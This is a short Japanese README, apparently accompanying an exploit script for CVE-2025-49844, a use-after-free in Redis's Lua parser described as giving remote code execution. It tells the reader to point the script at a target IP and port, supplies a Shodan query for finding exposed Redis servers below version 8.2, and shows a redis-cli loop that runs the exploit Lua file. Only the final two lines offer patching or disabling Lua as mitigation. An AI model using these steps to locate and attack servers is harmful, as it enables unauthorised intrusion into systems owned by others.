
CVE-2025-49844のエクスプロイトスクリプト。Redis Luaパーサーにおけるuse-after-free脆弱性を利用し、脆弱なRedisサーバー上でリモートコード実行を可能にします。
要約と簡単な説明:このスクリプトを実行して、
localhost
の代わりにターゲットのIPを指定し、ポートも設定すると接続されます。脆弱性がある場合、実行したい任意のコマンドを実行できます。
Shodanでも、このペイロードで脆弱なターゲットを見つけられます。
product:"Redis key-value store"
バージョンを確認し、8.2未満であることを確認してください。
while redis-cli -h localhost -p 6379 --eval CVE-2025-49844.lua >/dev/null; do
printf 'connect to server :) RCE'
done
可能であれば、Redisを8.2.2以降にアップデートしてください。
アップデートできない場合は、少なくとも匿名ユーザーや信頼できないユーザーに対してLuaの実行を無効にしてください。